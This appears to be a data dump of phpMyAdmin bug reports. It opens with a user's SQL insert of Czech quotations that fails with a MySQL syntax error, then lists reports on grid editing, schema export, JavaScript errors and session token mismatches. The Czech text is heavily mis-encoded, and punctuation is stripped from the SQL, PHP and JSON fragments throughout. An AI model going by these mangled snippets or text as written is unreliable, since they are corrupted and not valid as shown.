Cicero ); INSERT INTO `moudra` VALUES 153, Nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm je jxc3xadt spxc3xa1t potxc3xa9, co jsem se podxc3xadval do zrcadla a nemusel si plivnout do tvxc3xa1 amp; 345;e. Claudio Sperelli ); INSERT INTO `moudra` VALUES 154, Nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm je vyhrxc3xa1t milion.
To si lidxc3xa9 myslxc3xad.
Wilhelm Mxc3xbchs ); INSERT INTO `moudra` VALUES 155, Nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm pro amp; 269;lov amp; 283;ka je to, xc2x9ee m amp; 367;xc2x9ee vykonat, co povaxc2x9euje za dobrxc3xa9 a sprxc3xa1vnxc3xa9.
J. W. Goethe ); INSERT INTO `moudra` VALUES 156, Nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm pro lidskou spole amp; 269;nost je mxc3xadr.
Lev N. Tolstoj ); INSERT INTO `moudra` VALUES 157, Nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm v xc2x9eivot amp; 283; je jistota, xc2x9ee jsme milovxc3xa1ni takovxc3xad, jacxc3xad jsme, ba naopak nehled amp; 283; na to, jacxc3xad jsme!
Victor Hugo ); INSERT INTO `moudra` VALUES 158, N amp; 283;kdy se stane, xc2x9ee se na okamxc2x9eik cxc3xadtxc3xadme xc2x9a amp; 357;astni.
Nepodlxc3xa9hejme panice za chvxc3xadli to p amp; 345;ejde.
Gesualdo Bufalino ); INSERT INTO `moudra` VALUES 159, Nem amp; 367;xc2x9eeme xc2x9exc3xa1dat jablka od pomeran amp; 269;ovnxc3xadku a xc2x9at amp; 283;stxc3xad od xc2x9eivota.
Henrik Ibsen ); INSERT INTO `moudra` VALUES 160, Nenxc3xad amp; 269;lov amp; 283;ka, kterxc3xbd by si nep amp; 345;xc3xa1l vxc3xadc nexc2x9e cokoli jinxc3xa9ho prodlouxc2x9eit si xc2x9at amp; 283;stxc3xad.
Blaise Pascal ); INSERT INTO `moudra` VALUES 161, Nenxc3xad horxc2x9axc3xad cesty za xc2x9at amp; 283;stxc3xadm nexc2x9e hxc3xbd amp; 345;enxc3xad ve vybranxc3xa9 spole amp; 269;nosti , nebo amp; 357; txc3xadm se jen snaxc2x9exc3xadme zm amp; 283;nit svou existenci ve sled veselxc3xad, poxc2x9eitk amp; 367; a pot amp; 283;xc2x9aenxc3xad, v n amp; 283;mxc2x9e se nevyhneme zklamxc3xa1nxc3xad.
Arthur Schopenhauer ); INSERT INTO `moudra` VALUES 162, Nenxc3xad jinxc3xa9ho zp amp; 367;sobu, jak bxc3xbdt xc2x9a amp; 357;astnxc3xad, nexc2x9e xc2x9exc3xadt pro druhxc3xa9.
Lev.
N. Tolstoj ); INSERT INTO `moudra` VALUES 163, Nenxc3xad lepxc2x9axc3xadho zkrxc3xa1xc2x9alujxc3xadcxc3xadho prost amp; 345;edku, nexc2x9e je xc2x9at amp; 283;stxc3xad.
Marguerite Blessingtonovxc3xa1 ); INSERT INTO `moudra` VALUES 164, Nenxc3xad pravxc3xa9 xc2x9at amp; 283;stxc3xad bez Boha.
italskxc3xa9 p amp; 345;xc3xadslovxc3xad ); INSERT INTO `moudra` VALUES 165, Nenxc3xad sprxc3xa1vnxc3xa9 spot amp; 345;ebovxc3xa1vat vxc3xadce xc2x9at amp; 283;stxc3xad, nexc2x9e kolik ho p amp; 345;inxc3xa1xc2x9axc3xadme.
Glenn Close ); INSERT INTO `moudra` VALUES 166, Nenxc3xad v amp; 283;txc2x9axc3xadho xc2x9at amp; 283;stxc3xad nexc2x9e bxc3xbdt milovxc3xa1n Bohem jako bratrem.
Jean Baptiste Henri Lacordaire ); INSERT INTO `moudra` VALUES 167, Nenxc3xad zp amp; 367;sobu, jak dodat xc2x9at amp; 283;stxc3xad srdci, z n amp; 283;hoxc2x9e xc2x9exc3xa1dnxc3xa9 xc2x9at amp; 283;stxc3xad nevychxc3xa1zxc3xad.
Arturo Graf ); INSERT INTO `moudra` VALUES 168, Nepros Boha, aby t amp; 283; u amp; 269;inil xc2x9a amp; 357;astnxc3xbdm, ale uxc2x9eite amp; 269;nxc3xbdm.
xc2x8at amp; 283;stxc3xad se dostavxc3xad potom.
Margaret Mitchellovxc3xa1 ); INSERT INTO `moudra` VALUES 169, Nexc2x9at amp; 283;stxc3xadm a bolestxc3xad se amp; 269;lov amp; 283;k o amp; 269;ixc2x9a amp; 357;uje od vxc2x9aech trosek, jako zlato ohn amp; 283;m. Boxc2x9eena N amp; 283;mcovxc3xa1 ); INSERT INTO `moudra` VALUES 170, Netouxc2x9eit po xc2x9at amp; 283;stxc3xad nenxc3xad v naxc2x9axc3xad moci.
Nicolas de Malebranche ); INSERT INTO `moudra` VALUES 171, Nezajxc3xadmxc3xa1 m amp; 283; xc2x9at amp; 283;stxc3xad vxc2x9aech lidxc3xad, ale kaxc2x9edxc3xa9ho amp; 269;lov amp; 283;ka.
Boris Vian ); INSERT INTO `moudra` VALUES 172, Nexc2x9e se amp; 269;lov amp; 283;k vydxc3xa1 hledat xc2x9at amp; 283;stxc3xad, m amp; 283;l by se zeptat, zda je n amp; 283;kdo neztratil.
Zarko Petan ); INSERT INTO `moudra` VALUES 173, Nic na sv amp; 283;t amp; 283; vxc3xa1s nem amp; 367;xc2x9ee u amp; 269;init xc2x9a amp; 357;astnxc3xbdmi, pokud to nedokxc3xa1xc2x9eete vy sami.
Friedrich Bodenstedt ); INSERT INTO `moudra` VALUES 174, Nic nebrxc3xa1nxc3xad xc2x9at amp; 283;stxc3xad tolik jako p amp; 345;xc3xadlixc2x9anxc3xa1 touha a nadm amp; 283;rnxc3xa1 snaha si ho zajistit.
Arturo Graf ); INSERT INTO `moudra` VALUES 175, Nic nenxc3xad p amp; 345;xc3xadlixc2x9a malxc3xa9 pro tak malxc3xa9ho tvora, jakxc3xbdm je amp; 269;lov amp; 283;k. Prxc3xa1v amp; 283; zkoumxc3xa1nxc3xadm mali amp; 269;kostxc3xad dosahujeme velkxc3xa9ho um amp; 283;nxc3xad mxc3xadt co nejmxc3xa9n amp; 283; nexc2x9at amp; 283;stxc3xad a co nejvxc3xadce xc2x9at amp; 283;stxc3xad.
James Boswell ); INSERT INTO `moudra` VALUES 176, Nic z toho, co tvo amp; 345;xc3xad xc2x9at amp; 283;stxc3xad, nem amp; 367;xc2x9ee bxc3xbdt nedokonalxc3xa9.
Aristotelxc3xa9s ); INSERT INTO `moudra` VALUES 177, Nikdy jsem nevid amp; 283;l naprosto xc2x9a amp; 357;astnxc3xa9ho n amp; 283;koho, koho bohovxc3xa9 xc2x9at amp; 283;d amp; 345;e zahrnuli svxc3xbdmi dary.
Friedrich Schiller ); INSERT INTO `moudra` VALUES 178, Nikdy nejsme ani tak xc2x9a amp; 357;astnxc3xad, ani tak nexc2x9a amp; 357;astnxc3xad, jak si myslxc3xadme.
Franxc3xa7ois de la Rochefoucauld ); INSERT INTO `moudra` VALUES 179, Nikdy nepovaxc2x9eujte za xc2x9a amp; 357;astnxc3xa9ho toho, kdo je zxc3xa1vislxc3xbd na vn amp; 283;jxc2x9axc3xadch okolnostech.
Seneca ); INSERT INTO `moudra` VALUES 180, Nikdy nesexc2x9ael ze svxc3xa9 cesty.
To je skoro definice pozemskxc3xa9ho xc2x9at amp; 283;stxc3xad.
Egon Friedell ); INSERT INTO `moudra` VALUES 181, Nikdy si nep amp; 345;ej p amp; 345;xc3xadlixc2x9a velkxc3xa9 xc2x9at amp; 283;stxc3xad!
Nebesa by ti je mohla ud amp; 283;lit.
amp; 269;xc3xadnskxc3xa9 p amp; 345;xc3xadslovxc3xad ); INSERT INTO `moudra` VALUES 182, O nikom nem amp; 367;xc2x9eeme amp; 345;xc3xadci, xc2x9ee byl xc2x9a amp; 357;astnxc3xbd, dokud nezem amp; 345;e a nenxc3xad poh amp; 345;ben.
Ovidius ); INSERT INTO `moudra` VALUES 183, Od amp; 345;xc3xadkxc3xa1nxc3xad je kouzelnxc3xa9 sl amp; 367;vko, kterxc3xa9 vyvolxc3xa1 vexc2x9akerxc3xa9 xc2x9at amp; 283;stxc3xad.
Ludwig Bxc3xb6rne ); INSERT INTO `moudra` VALUES 184, Opravdovxc3xa1 lxc3xa1ska nehledxc3xa1 svxc3xa9 xc2x9at amp; 283;stxc3xad, nxc3xbdbrxc2x9e zapomxc3xadnajxc3xadc na sebe vxc2x9aeho se chce z amp; 345;xc3xadci, vxc2x9aechno darovat a v tom nalxc3xa9zt svxc3xa9 xc2x9at amp; 283;stxc3xad.
Augustin Wibbelt ); INSERT INTO `moudra` VALUES 185, Opravdovxc3xa9 xc2x9at amp; 283;stxc3xad je jen plodem ctnosti a odm amp; 283;nou za ni.
Antonio Rosmini ); INSERT INTO `moudra` VALUES 186, Opravdovxc3xa9 xc2x9at amp; 283;stxc3xad m amp; 367;xc2x9eeme najxc3xadt jen tehdy, kdyxc2x9e mezi nxc3xa1mi a Bohem panuje vztah lxc3xa1sky.
Matka Tereza z Kalkaty ); INSERT INTO `moudra` VALUES 187, Opravdovxc3xa9 xc2x9at amp; 283;stxc3xad spo amp; 269;xc3xadvxc3xa1 v radosti hledanxc3xa9 v tob amp; 283;, Pane jen v txc3xa9to, a xc2x9exc3xa1dnxc3xa9 jinxc3xa9.
sv.
Augustin ); INSERT INTO `moudra` VALUES 188, Opravdovxc3xa9 xc2x9at amp; 283;stxc3xad spo amp; 269;xc3xadvxc3xa1 v tom, co darujeme.
sv.
Jan Zlatoxc3xbastxc3xbd ); INSERT INTO `moudra` VALUES 189, Opravdovxc3xa9 xc2x9at amp; 283;stxc3xad stojxc3xad za mxc3xa1lo je li drahxc3xa9, nestojxc3xad za nic.
Franxc3xa7ois Renxc3xa9 de Chateaubriand ); INSERT INTO `moudra` VALUES 190, Opravdovxc3xbd p amp; 345;xc3xadtel nxc3xa1m vxc3xadc dopomxc3xa1hxc3xa1 ke xc2x9at amp; 283;stxc3xad nexc2x9e tisxc3xadc nep amp; 345;xc3xa1tel k nexc2x9at amp; 283;stxc3xad.
Marie Ebner Eschenbachovxc3xa1 ); INSERT INTO `moudra` VALUES 191, Opravdu xc2x9a amp; 357;astnxc3xbd je jen ten, kdo na sebe bere rizika lxc3xa1sky.
Roger Schutz ); INSERT INTO `moudra` VALUES 192, Opravdu xc2x9a amp; 357;astnxc3xbd je ten amp; 269;lov amp; 283;k, kterxc3xa9mu se xc2x9exc3xa1dnxc3xa9ho dne nep amp; 345;ihodxc3xad nic zlxc3xa9ho.
Eurxc3xadpidxc3xa9s ); INSERT INTO `moudra` VALUES 193, Plnxc3xa9 xc2x9at amp; 283;stxc3xad je lxc3xa1ska.
Angelus Silesius ); INSERT INTO `moudra` VALUES 194, Podmxc3xadnkami k dosaxc2x9eenxc3xad xc2x9at amp; 283;stxc3xad jsou boj, nxc3xa1maha a vytrvalost.
Antoine de Saint Exupxc3xa9ry ); INSERT INTO `moudra` VALUES 195, Pohled na xc2x9a amp; 357;astnxc3xa9ho amp; 269;lov amp; 283;ka uklid amp; 328;uje.
Skute amp; 269;nost, xc2x9ee jsme jej xc2x9a amp; 357;astnxc3xbdm u amp; 269;inili my, oblaxc2x9euje.
Theodor G. Hippel ); INSERT INTO `moudra` VALUES 196, Pokaxc2x9edxc3xa9, kdyxc2x9e si znovu uv amp; 283;domxc3xadme svxc3xa9 xc2x9at amp; 283;stxc3xad, zrodxc3xad se v nxc3xa1s novxc3xa1 touha xc2x9exc3xadt.
Marcel Proust ); INSERT INTO `moudra` VALUES 197, Pot amp; 283;xc2x9aenxc3xad se m amp; 367;xc2x9ee zaklxc3xa1dat na iluzi, ale xc2x9at amp; 283;stxc3xad vyr amp; 367;stxc3xa1 z pravdy.
Nicolas de Chamfort ); INSERT INTO `moudra` VALUES 198, Povaxc2x9eujeme za nepopiratelnou pravdu, xc2x9ee vxc2x9aichni lidxc3xa9 byli stvo amp; 345;eni rovnocennxc3xad a byli obda amp; 345;eni n amp; 283;kterxc3xbdmi nezcizitelnxc3xbdmi prxc3xa1vy jako je prxc3xa1vo na xc2x9eivot, na svobodu a na xc2x9at amp; 283;stxc3xad.
Deklarace nezxc3xa1vislosti Spojenxc3xbdch stxc3xa1t amp; 367; americkxc3xbdch ); INSERT INTO `moudra` VALUES 199, Pravxc3xa9 xc2x9at amp; 283;stxc3xad je v tom, xc2x9ee po n amp; 283;m netouxc2x9exc3xadme, nebo amp; 357; spo amp; 269;xc3xadvxc3xa1 prxc3xa1v amp; 283; v tom, xc2x9ee jsme svobodnxc3xad.
Epiktxc3xa9tos ); INSERT INTO `moudra` VALUES 200, Pravxc3xa9 xc2x9at amp; 283;stxc3xad nenxc3xad ani v bohatstvxc3xad nebo v blahobytu, ani v lidskxc3xa9 slxc3xa1v amp; 283; nebo moci, ani v xc2x9exc3xa1dnxc3xa9 lidskxc3xa9 amp; 269;innosti, jakkoli m amp; 367;xc2x9ee bxc3xbdt uxc2x9eite amp; 269;nxc3xa1, jako v amp; 283;da, technika, um amp; 283;nxc3xad, ani v xc2x9exc3xa1dnxc3xa9m tvoru, nxc3xbdbrxc2x9e pouze v Bohu, prameni vexc2x9akerxc3xa9ho dobra a vexc2x9akerxc3xa9 lxc3xa1sky.
Katechismus katolickxc3xa9 cxc3xadrkve ); INSERT INTO `moudra` VALUES 201, Pravxc3xa9 xc2x9at amp; 283;stxc3xad spo amp; 269;xc3xadvxc3xa1 v dokonalosti mxc3xa9ho ducha, totixc2x9e v umxc3xadrn amp; 283;nosti, spravedlnosti, svobod amp; 283;, lxc3xa1sce, laskavosti, poznxc3xa1nxc3xad Boha, podporovxc3xa1nxc3xad jeho xc3xbamysl amp; 367; a odevzdanosti do jeho svatxc3xa9 v amp; 367;le.
Moses Mendelssohn ); INSERT INTO `moudra` VALUES 202, Pro ctnostnxc3xa9ho amp; 269;lov amp; 283;ka je xc2x9at amp; 283;stxc3xad a nexc2x9at amp; 283;stxc3xad jako pravice a levice poxc2x9exc3xadvxc3xa1 ob amp; 283;.
sv.
Kate amp; 345;ina Sienskxc3xa1 ); INSERT INTO `moudra` VALUES 203, Pro kaxc2x9edou bytost obda amp; 345;enou rozumovxc3xbdmi schopnostmi je nejv amp; 283;txc2x9axc3xadm xc2x9at amp; 283;stxc3xadm poznxc3xa1nxc3xad Boha.
sv.
Tomxc3xa1xc2x9a Akvinskxc3xbd ); INSERT INTO `moudra` VALUES 204, Pro amp; 269; nenachxc3xa1zxc3xadme xc2x9at amp; 283;stxc3xad?
Protoxc2x9ee je hledxc3xa1me tam, kde nenxc3xad na vrcholu svxc3xa9 existence, ve velkxc3xa9 dxc3xa1lce.
Ale ono se naopak nachxc3xa1zxc3xad na klidnxc3xa9m, stinnxc3xa9m a dob amp; 345;e skrytxc3xa9m mxc3xadst amp; 283;, na nexc2x9e, bohuxc2x9eel, dosp amp; 283;jeme jen z amp; 345;xc3xaddka v naxc2x9aem nitru.
Joseph von Kapff Essenther ); INSERT INTO `moudra` VALUES 205, P amp; 345;xc3xadroda vloxc2x9eila do kaxc2x9edxc3xa9ho dobrxc3xa9ho srdce tento uxc2x9alechtilxc3xbd cit amp; 269;lov amp; 283;k nem amp; 367;xc2x9ee bxc3xbdt xc2x9a amp; 357;astnxc3xbd sxc3xa1m, ale musxc3xad svxc3xa9 xc2x9at amp; 283;stxc3xad hledat v dobru n amp; 283;koho jinxc3xa9ho.
J. W. Goethe ); INSERT INTO `moudra` VALUES 206, Radost se zaklxc3xa1dxc3xa1 na pokojnxc3xa9 d amp; 367;v amp; 283; amp; 345;e, xc2x9ee dobro stejn amp; 283; nakonec zvxc3xadt amp; 283;zxc3xad.
Helen Kellerovxc3xa1 ); INSERT INTO `moudra` VALUES 207, Radosti se nelze zmocnit, musxc3xad se t amp; 283; zmocnit sama.
Nelze jxc3xad klxc3xa1st podmxc3xadnky.
Paul Claudel ); INSERT INTO `moudra` VALUES 208, Rodinnxc3xa9 radosti jsou pro amp; 269;lov amp; 283;ka t amp; 283;mi nejcenn amp; 283;jxc2x9axc3xadmi a radost, kterou majxc3xad rodi amp; 269;e ze svxc3xbdch d amp; 283;txc3xad, je nejsv amp; 283;t amp; 283;jxc2x9axc3xad na sv amp; 283;t amp; 283;.
Johann H. Pestalozzi ); INSERT INTO `moudra` VALUES 209, Rozumnxc3xbd tvor p amp; 345;irozen amp; 283; touxc2x9exc3xad po xc2x9at amp; 283;stxc3xad MySQL hlxc3xa1sxc3xad 1064 You have an error in your SQL syntax near Nejv amp; 283;txc2x9axc3xad xc2x9at amp; 283;stxc3xad, jehoxc2x9e m amp; 367;xc2x9eeme dosxc3xa1hnout, je poznxc3xa1nxc3xad, xc2x9ee xc2x9at amp; 283;stxc3xad nakonec nenxc3xad nezb at line 1 Original URL https sourceforge.net p phpmyadmin support requests 543 https sourceforge.net p phpmyadmin support requests 543 Original author toulegn","bug"
"24444","11318","Database with in name and setted privilages no diesplay.
Hello, I found the follwing bug in phpMyAdmin 2.5.6 and 2.6 alpha2, too) 1\.
I ve created a database like my database , with the char .
2\.
Than I created a user xyz with no rights .
3\.
Than I gave xyz some access SELECT, INSERT, etc) to the database my database and to other databases like somedatabase2 .
4\.
The problem is, that the user xyz get only the databases without listed, not the database my database .
I ve checked with a short PHP Script the permissions on my database , and the permissions was OK for the user xyz !
5\.
Now I debuged the code of phpMyAdmin, I deactivated the following lines in common.lib.php if is show dbs ereg |[ \]) | ) , dblist[ i])) \{ local query = SHOW DATABASES LIKE \ .
dblist[ i] .
\ ; rs = PMA mysql query local query, dbh); SHOW DATABASES statement is disabled if i == 0 PMA mysql error ) mysql errno ) == 1045)) \{ true dblist[] = str replace \\ , , str replace \\ , , dblist[ i])); is show dbs = FALSE; \} Debug else if PMA mysql error )) \{ PMA mysqlDie , local query, FALSE); \} while row = PMA mysql fetch row rs)) \{ true dblist[] = row[0]; \} end while if rs) \{ mysql free result rs); \} \} else \{ true dblist[] = str replace \\ , , str replace \\ , , dblist[ i])); \} end if... else... \} end for 6\.
I think, that there is a problem with the regexp!
Please fix it!
Here is my configuration PHP 4.3.6 MySQL 4.0.20 Apache 2.x I think 2.47) phpMyAdmin 2.5.6 and 2.6alpha2 Best reguards Stefan stefan.kaifer hartmann.info Original URL https sourceforge.net p phpmyadmin bugs 1260 https sourceforge.net p phpmyadmin bugs 1260 Original author anonymous Found in version 2.5.6","bug"
"24444","11320","Live edit of data fields is not working always.
Hello, the live edit of data fields is not working when inserting from the clipboard in the following case edit a data field that is null insert text from clipboard with shift insert not ctrl v) press enter Result The new value is not saved.
I am using Windows 7 Chrome 44 and the latest PMA 4.4.12.
Best regards Michael example table <pre> CREATE TABLE IF NOT EXISTS `example` `id` int 11) NOT NULL, `info` varchar 255) COLLATE utf8 unicode ci DEFAULT NULL ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8 unicode ci; INSERT INTO `example` `id`, `info`) VALUES 1, This is a test.
This is a test.
), 2, NULL), 3, NULL), 4, NULL); ALTER TABLE `example` ADD PRIMARY KEY `id`); < pre> !
[pma step1] https cloud.githubusercontent.com assets 6604906 8889361 b3a10e22 3301 11e5 82dd 573ed70024e2.jpg) !
[pma step2] https cloud.githubusercontent.com assets 6604906 8889362 b3a84ef8 3301 11e5 9445 e268f40d248f.jpg)","bug"
"24444","11322","Missing null checkbox when grid editing a null cell.
For a nullable column, the null checkbox is missing when grid editing a cell that is already null.
If you enter some value and want to revert back to null before saving there is no option to do so.
Even though not a serious issue it would be more consistent to show the null checkbox for nullable column regardless of cell s current value.","bug"
"24444","11324","JS error while opening a new page in Desginer.
The error is in the master branch.
`` { pma version 4.5.0 dev , browser name CHROME , browser version 44.0.2403.107 , user os Win , server software Apache 2.4.9 Win64) OpenSSL 1.0.1g PHP 5.5.12 , user agent string Mozilla 5.0 Windows NT 6.3; WOW64) AppleWebKit 537.36 KHTML, like Gecko) Chrome 44.0.2403.107 Safari 537.36 , locale en , configuration storage enabled , php version 5.5.12 , exception type js , exception { mode stack , name ReferenceError , message PMA MicroHistory is not defined , stack [ { func HTMLAnchorElement.AJAX.requestHandler , line 280, column 23 , context [ if !
isLink) {\r , params = this).serialize );\r , }\r , if !
history history.pushState)) {\r , Add a list of menu hashes that we have in the cache to the r ... , params = PMA MicroHistory.menus.getRequestParam );\r , }\r , \r , if AJAX.
debug) {\r , console.log \ Loading \ url); no need to translate\r , }\r ], filename ajax.js }, { func HTMLAnchorElement.new func , line 246, column 33 , context [ \r , wrap function function func) {\r , if !func.wrapped) {\r , var new func = function ) {\r , try {\r , return func.apply this, arguments);\r , } catch x) {\r , TraceKit.report x);\r , }\r , };\r , new func.wrapped = true;\r ], filename error report.js }, ... ``","bug"
"24444","11325","Exporting database schema to PDF is broken.
Broken in master branch.
Generates a corrupted PDF file.","bug"
"24444","11326","Exported schema includes all the tables of the database.
Bug found in QA 4 4 branch Even though some tables may be hidden in a certain designer page, when exported these tables are visible in the exported file.","bug"
"24444","11327","Default value for BIT column exported as b.
When I export a BIT 1) column having b 1 as its default value I get `is primary BIT 1) NOT NULL DEFAULT b`","bug"
"24444","11328","Exporting table generates AUTO INCREMENT=; for new tables.
Found in master branch.
`SHOW CREATE TABLE` does not return an `AUTO INCREMENT` value for a new table and the output of the generated export contains AUTO INCREMENT=;.
For example `MODIFY id INT 11) NOT NULL AUTO INCREMENT, AUTO INCREMENT=;`","bug"
"24444","11334","Table creation time, last update and last check column are empty.
Issue is in current master.","bug"
"24444","11336","Exporting a table exports database level events.
Found in QA 4 4 Events should be exported with a database export rather than table exports","bug"
"24444","11338","Object doesn t support property or method live .
If I select a database in Version 4.4.12 I get the following error every time.
After the message is shown, the complete PMA is not working.
I downgrade now... { pma version 4.4.12 , browser name CHROME , browser version 42.0.2311.135 , user os Win , server software Apache 2.4.12 Win32) OpenSSL 1.0.1l PHP 5.6.8 , user agent string Mozilla 5.0 Windows NT 10.0; Win64; x64) AppleWebKit 537.36 KHTML, like Gecko) Chrome 42.0.2311.135 Safari 537.36 Edge 12.10240 , locale de , configuration storage enabled , php version 5.6.8 , exception type js , exception { mode stack , name TypeError , message Object doesn t support property or method live , stack [ { line 235, func , context [ lastException = null; , notifyHandlers.apply null, [stack, null].concat args)); , } , }, stack.incomplete ?
2000 0)); , , throw ex; re throw to propagate to the top level and cause wind ... , } , , report.subscribe = subscribe; , report.unsubscribe = unsubscribe; , return report; ], filename tracekit tracekit.js }, { func new func , line 279, column 21 , context [ , wrap function function func) { , if !func.wrapped) { , var new func = function ) { , try { , return func.apply this, arguments); , } catch x) { , TraceKit.report x); , } , }; , new func.wrapped = true; ], filename error report.js }, { func m.event.dispatch , line 3, column 8380 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func event.dispatch , line 374, column 2 , context [ event.dispatch = function event ){ , \tif .data this, \ suppress.\ event.type ) new Date ).getTime ) > 0 ){ , \t\t .removeData this, \ suppress.\ event.type ); , \t\treturn; , \t} , \treturn dispatch.apply this, arguments ); , }; , , event fix hooks for touch events... , var touchHooks = , event.fixHooks.touchstart = ], filename jquery jquery.event.drag 2.2.js }, { func r.handle , line 3, column 5064 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func m.event.trigger , line 3, column 7535 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func each , line 2, column 2966 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func m.prototype.each , line 2, column 826 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { ], filename jquery jquery 1.11.1.min.js }, { func trigger , line 3, column 15368 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js } ], useragent Mozilla 5.0 Windows NT 10.0; Win64; x64) AppleWebKit 537.36 KHTML, like Gecko) Chrome 42.0.2311.135 Safari 537.36 Edge 12.10240 , incomplete false , partial true , uri db structure.php?target= }, script name db structure.php , microhistory { pages [ { hash index.php?db= table= server=1 target= token=663e48b41f5ee14616f0ef1a461cd07c }, { hash db structure.php?db=information schema table= server=1 target= token=663e48b41f5ee14616f0ef1a461cd07c , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang de , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Anzeigen , pma text left default tab Struktur , pma text left default tab2 false , LimitChars 50 , pftext , confirm true , LoginCookieValidity 1440 , logged in true , auth type cookie } } ], current index 2 } }","bug"
"24444","11339","Results not displayed if query ends in delimiter and comment.
Hello, When executing queries like the one below the results are not being displayed.
.
It looks like removing `;` from the query fixes this issue.
This bug is in 4.4 too.","bug"
"24444","11340","Not all results are displayed.
Hello, I am not sure if this is intentional or not, but I see that the behavior of the following query changed USE sakila; SELECT FROM actor; SELECT FROM address; In [master] http demo.phpmyadmin.net master config ), it looks like it displays results only for the third query and in [4.4] http demo.phpmyadmin.net QA 4 4 ?pma username=root) it looks like it displays results only for the first and the second query.
At first, I thought I broke something with the new parser, but I tested against 053f7fc, which is the last commit of the pull request that implemented the [new parser] https github.com phpmyadmin phpmyadmin pull 1728) and it worked fine.","bug"
"24444","11344","Reference Error is not defined.
Latest release of phpMyAdmin.
blank page when trying to login !
[img] http puu.sh jnjgf 942fdff86b.png) HHVM 3.8.0.0 NGINX 1.8.0","bug"
"24444","11345","token miss match error.
Since recently pma has become completely unusable.
Seems to be some issue with sessions.
Running the latest version using composer to install.
just updated to dc1f6a8 and tested, was broken also on b47b4e3) Login is fine, works and can access the site session files are created in the defined session folder, all owned by `www data` eg .
after login can view any database, tables etc.
sessions are active for decent amount of time At some point there is ajax calls made, easiest to replicate is on the query box.
After this happens token miss match popup shows and can no longer click anything.
reloading the page results in a new token but am still logged into pma.
eg url .. server sql.php?db= server=3 token=1d45b8b705508e6297b56f10b54da595 result http i.imgur.com oiXu15c.png This is happening for everyone in the office, any browser.
cleared cookies, private browsing etc.","bug"
"24444","11349","Table list doesn t expand when current table on different page.
To reproduce 1.
In phpMyAdmin, click a database name on the left panel.
It should have more tables than fit into one page.)
2.
Scroll down the table list in the main panel, not the left one) and click a table that s not on the first page of tables shown at the left.
Expected To go to the table browse view) in the main panel, and the table list to be shown at the left with said table highlighted.
Actual Table list on left collapses instead.
This is a regression, I ve reported it before DisgruntledGoat on sourceforge) and it got fixed once.
PMA 4.4.12 git STABLE branch), same issue occurs on Apache localhost) and nginx live server).","bug"
"24444","11352","Broken view cannot be edited.
If a view has an error e. g. unknown column name because column has been renamed) this error cannot be fixed, because it is not possible to edit the view in phpmyadmin any more.
It just displays an error message.","bug"
"24444","11355","cfg[ Servers ][ i][ favorite ] ...not OK and cfg[ Servers ][ i][ central columns ] ... not OK. hello guys!
any ideas how to fix this two issues?
1) cfg[ Servers ][ i][ favorite ] ... not OK Persistent favorite tables Disabled 2) cfg[ Servers ][ i][ central columns ] ... not OK Managing Central list of columns Disabled","bug"
"24444","11356","2.6.3 pl1) Not displaying results of complex query.
I created a MySQL addressbook which has 8 tables 1Organizations Organization names 1People Contact names, groups 2email Stores multiple email addresses per contact 2im multiple IM media type, user names per contact 2locations multiple addresses per contact 2phone multiple phone numbers per contact cell, home, etc) 2web multiple URLs per contact 2workinfo links People to Organizations I wrote a query or is it a script?)
to create a flat file Mozilla Thunderbird addressbook export for personal contacts, and another one for professional contacts.
The query or script?)
